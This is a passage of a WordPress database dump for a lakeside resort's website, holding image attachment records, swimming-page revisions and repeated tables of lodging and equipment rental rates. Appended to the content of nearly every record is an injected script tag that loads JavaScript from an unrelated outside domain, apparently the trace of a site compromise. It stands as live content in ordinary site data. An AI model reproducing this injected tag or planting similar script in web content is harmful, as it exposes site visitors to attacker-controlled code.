src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN2537','','inherit','open','closed','','dscn2537','','','2016-08-20 08:04:39','2016-08-20 13:04:39','',107,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2537.jpg',0,'attachment','image/jpeg',0),(226,2,'2016-08-20 08:05:39','2016-08-20 13:05:39','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN2724','','inherit','open','closed','','dscn2724','','','2016-08-20 08:05:39','2016-08-20 13:05:39','',107,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2724.jpg',0,'attachment','image/jpeg',0),(227,2,'2016-08-20 08:06:22','2016-08-20 13:06:22','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN3361','','inherit','open','closed','','dscn3361','','','2018-02-10 18:51:03','2018-02-11 00:51:03','',107,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3361.jpg',4,'attachment','image/jpeg',0),(228,2,'2016-08-20 08:07:17','2016-08-20 13:07:17','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN3650','','inherit','open','closed','','dscn3650','','','2016-08-20 08:07:17','2016-08-20 13:07:17','',107,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3650.jpg',0,'attachment','image/jpeg',0),(229,2,'2016-08-20 08:08:30','2016-08-20 13:08:30','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN3760','','inherit','open','closed','','dscn3760','','','2016-08-20 08:08:30','2016-08-20 13:08:30','',107,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3760.jpg',0,'attachment','image/jpeg',0),(230,2,'2016-08-20 08:10:47','2016-08-20 13:10:47','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN2574','','inherit','open','closed','','dscn2574','','','2016-08-20 08:10:47','2016-08-20 13:10:47','',107,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2574.jpg',0,'attachment','image/jpeg',0),(231,2,'2016-08-20 08:11:13','2016-08-20 13:11:13','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN2583','','inherit','open','closed','','dscn2583','','','2016-08-20 08:11:13','2016-08-20 13:11:13','',107,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2583.jpg',0,'attachment','image/jpeg',0),(232,2,'2017-01-25 16:09:49','2017-01-25 22:09:49','<img class=\"alignnone size-medium wp-image-363\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Fall-Frenzy-001-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-359\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3833-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-226\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2724-300x225.jpg\" alt=\"DSCN2724\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-25\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/IMG_7500-300x200.jpg\" alt=\"IMG_7500\" width=\"300\" height=\"200\" /><img class=\"alignnone size-medium wp-image-229\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3760-300x225.jpg\" alt=\"DSCN3760\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-110\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/Carly-152-300x225.jpg\" alt=\"Carly 152\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-345\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC03045-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-310\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Walleye11-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-293\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-124-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-292\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-107-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-290\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-092-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-106-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-291\" />\nA great way to spend a hot sunny day is on our sandy beach.  The beach is shallow and has a slide in the water.  \nFor those that like to hang out in deeper water there is a floating raft.  \nPelican Lake is a 4,000 acre lake but is also a shallow lake and warms up quite early making it a great place to swim all summer.<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Swimming','','inherit','closed','closed','','107-autosave-v1','','','2017-01-25 16:09:49','2017-01-25 22:09:49','',107,'http://ashbyresort.com/107-autosave-v1/',0,'revision','',0),(233,2,'2016-08-20 08:17:56','2016-08-20 13:17:56','<img class=\"alignnone size-medium wp-image-226\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2724-300x225.jpg\" alt=\"DSCN2724\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-25\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/IMG_7500-300x200.jpg\" alt=\"IMG_7500\" width=\"300\" height=\"200\" /><img class=\"alignnone size-medium wp-image-229\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3760-300x225.jpg\" alt=\"DSCN3760\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-110\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/Carly-152-300x225.jpg\" alt=\"Carly 152\" width=\"300\" height=\"225\" /><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Swimming','','inherit','closed','closed','','107-revision-v1','','','2016-08-20 08:17:56','2016-08-20 13:17:56','',107,'http://ashbyresort.com/107-revision-v1/',0,'revision','',0),(236,2,'2016-08-20 08:42:01','2016-08-20 13:42:01','<img class=\"alignnone size-medium wp-image-226\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2724-300x225.jpg\" alt=\"DSCN2724\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-25\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/IMG_7500-300x200.jpg\" alt=\"IMG_7500\" width=\"300\" height=\"200\" /><img class=\"alignnone size-medium wp-image-229\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3760-300x225.jpg\" alt=\"DSCN3760\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-110\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/Carly-152-300x225.jpg\" alt=\"Carly 152\" width=\"300\" height=\"225\" />\r\nThe swimming beach is sandy and shallow with a slide in the water.  There is also a floating raft for those that like deeper water.<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Swimming','','inherit','closed','closed','','107-revision-v1','','','2016-08-20 08:42:01','2016-08-20 13:42:01','',107,'http://ashbyresort.com/107-revision-v1/',0,'revision','',0),(237,2,'2016-08-26 12:45:23','2016-08-26 17:45:23','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2016 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2016,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$70.00,$85.00,$425.00,$490.00,4\r\nKitchenettes Motel,1,$90.00,$125.00,$525.00,$625.00,4\r\nSuite 9,2,$160.00,$200.00,$850.00,$950.00,4\r\nCabins (#10 #11 #12),2,$160.00,$200.00,$850.00,\"$1,000.00\",8\r\nNew Cabins (#13 #14),2,$185.00,$225.00,$950.00,\"$1,100.00\",8\r\nTents 1 per site w/ hook up, ,$25.00,$30.00,$130.00,\"$1300.00\",8\r\nRV Camping 1 Vehicle per site,,$34.00,$40.00,$200.00,\"$200.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong> Prices shown are for groups of 4 or less.</strong>\r\n<strong> Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nTHERE IS A PET FEE OF $5.00/DAY\r\nPETS MUST BE LEASHED AND PICKED UP AFTER.\r\nYOU ARE RESPONSIBLE FOR ANY DAMAGE CAUSED BY THEM.\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Boat,$20.00,$100.00,\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">16\' Pontoon with 25 H.P. Motor,$115.00,$400.00,Plus Gas</del>\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-08-26 12:45:23','2016-08-26 17:45:23','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(239,2,'2016-08-26 12:46:57','2016-08-26 17:46:57','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2016 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2016,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$70.00,$85.00,$425.00,$490.00,4\r\nKitchenettes Motel,1,$90.00,$125.00,$525.00,$625.00,4\r\nSuite 9,2,$160.00,$200.00,$850.00,$950.00,4\r\nCabins (#10 #11 #12),2,$160.00,$200.00,$850.00,\"$1,000.00\",8\r\nNew Cabins (#13 #14),2,$185.00,$225.00,$950.00,\"$1,100.00\",8\r\nTents 1 per site w/ hook up, ,$25.00,$30.00,$130.00,\"$1300.00\",8\r\nRV Camping 1 Vehicle per site,,$34.00,$40.00,$200.00,\"$200.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong> Prices shown are for groups of 4 or less.</strong>\r\n<strong> Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nTHERE IS A PET FEE OF $5.00/DAY\r\nPETS MUST BE LEASHED AND PICKED UP AFTER.\r\nYOU ARE RESPONSIBLE FOR ANY DAMAGE CAUSED BY THEM.\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Boat,$20.00,$100.00,\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">16\' Pontoon with 25 H.P. Motor,$115.00,$400.00,Plus Gas</del>\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-08-26 12:46:57','2016-08-26 17:46:57','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(240,2,'2016-08-26 12:52:44','2016-08-26 17:52:44','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2016 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2016,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$70.00,$85.00,$425.00,$490.00,4\r\nKitchenettes Motel,1,$90.00,$125.00,$525.00,$625.00,4\r\nSuite 9,2,$160.00,$200.00,$850.00,$950.00,4\r\nCabins (#10 #11 #12),2,$160.00,$200.00,$850.00,\"$1,000.00\",8\r\nNew Cabins (#13 #14),2,$185.00,$225.00,$950.00,\"$1,100.00\",8\r\nTents 1 per site w/ hook up, ,$25.00,$30.00,$130.00,\"$1300.00\",8\r\nRV Camping 1 Vehicle per site,,$34.00,$40.00,$200.00,\"$200.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong> Prices shown are for groups of 4 or less.</strong>\r\n<strong> Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nTHERE IS A PET FEE OF $5.00/DAY\r\nPETS MUST BE LEASHED AND PICKED UP AFTER.\r\nYOU ARE RESPONSIBLE FOR ANY DAMAGE CAUSED BY THEM.\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Boat,$20.00,$100.00,\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-08-26 12:52:44','2016-08-26 17:52:44','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(245,2,'2016-09-05 08:59:51','2016-09-05 13:59:51','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2016 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2016,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$70.00,$85.00,$425.00,$490.00,4\r\nKitchenettes Motel,1,$90.00,$125.00,$525.00,$625.00,4\r\nSuite 9,2,$160.00,$200.00,$850.00,$950.00,4\r\nCabins (#10 #11 #12),2,$160.00,$200.00,$850.00,\"$1,000.00\",8\r\nNew Cabins (#13 #14),2,$185.00,$225.00,$950.00,\"$1,100.00\",8\r\nNon Electric Site ,$25.00,$30.00,$130.00,\"$1300.00\",8\r\nElectric Sites 1  per site,,$34.00,$40.00,$200.00,\"$200.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong> Prices shown are for groups of 4 or less.</strong>\r\n<strong> Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nTHERE IS A PET FEE OF $5.00/DAY\r\nPETS MUST BE LEASHED AND PICKED UP AFTER.\r\nYOU ARE RESPONSIBLE FOR ANY DAMAGE CAUSED BY THEM.\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Boat,$20.00,$100.00,\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-09-05 08:59:51','2016-09-05 13:59:51','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(246,2,'2016-09-05 09:01:49','2016-09-05 14:01:49','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2016 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2016,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$70.00,$85.00,$425.00,$490.00,4\r\nKitchenettes Motel,1,$90.00,$125.00,$525.00,$625.00,4\r\nSuite 9,2,$160.00,$200.00,$850.00,$950.00,4\r\nCabins (#10 #11 #12),2,$160.00,$200.00,$850.00,\"$1,000.00\",8\r\nNew Cabins (#13 #14),2,$185.00,$225.00,$950.00,\"$1,100.00\",8\r\nCamping Non Electric Site,,1 per site$25.00,$30.00,$130.00,\"$1300.00\",\r\nCamping Electric Sites 1  per site,,$34.00,$40.00,$200.00,\"$200.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong> Prices shown are for groups of 4 or less.</strong>\r\n<strong> Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nTHERE IS A PET FEE OF $5.00/DAY\r\nPETS MUST BE LEASHED AND PICKED UP AFTER.\r\nYOU ARE RESPONSIBLE FOR ANY DAMAGE CAUSED BY THEM.\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Boat,$20.00,$100.00,\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-09-05 09:01:49','2016-09-05 14:01:49','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(247,2,'2016-09-05 09:04:02','2016-09-05 14:04:02','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2016 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2016,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$70.00,$85.00,$425.00,$490.00,4\r\nKitchenettes Motel,1,$90.00,$125.00,$525.00,$625.00,4\r\nSuite 9,2,$160.00,$200.00,$850.00,$950.00,4\r\nCabins (#10 #11 #12),2,$160.00,$200.00,$850.00,\"$1,000.00\",8\r\nNew Cabins (#13 #14),2,$185.00,$225.00,$950.00,\"$1,100.00\",8\r\nCamping Non Electric Site,1 per site,$25.00,$30.00,$130.00,\"$1300.00\",\r\nCamping Electric Sites,1  per site,$34.00,$40.00,$200.00,\"$200.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong> Prices shown are for groups of 4 or less.</strong>\r\n<strong> Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nTHERE IS A PET FEE OF $5.00/DAY\r\nPETS MUST BE LEASHED AND PICKED UP 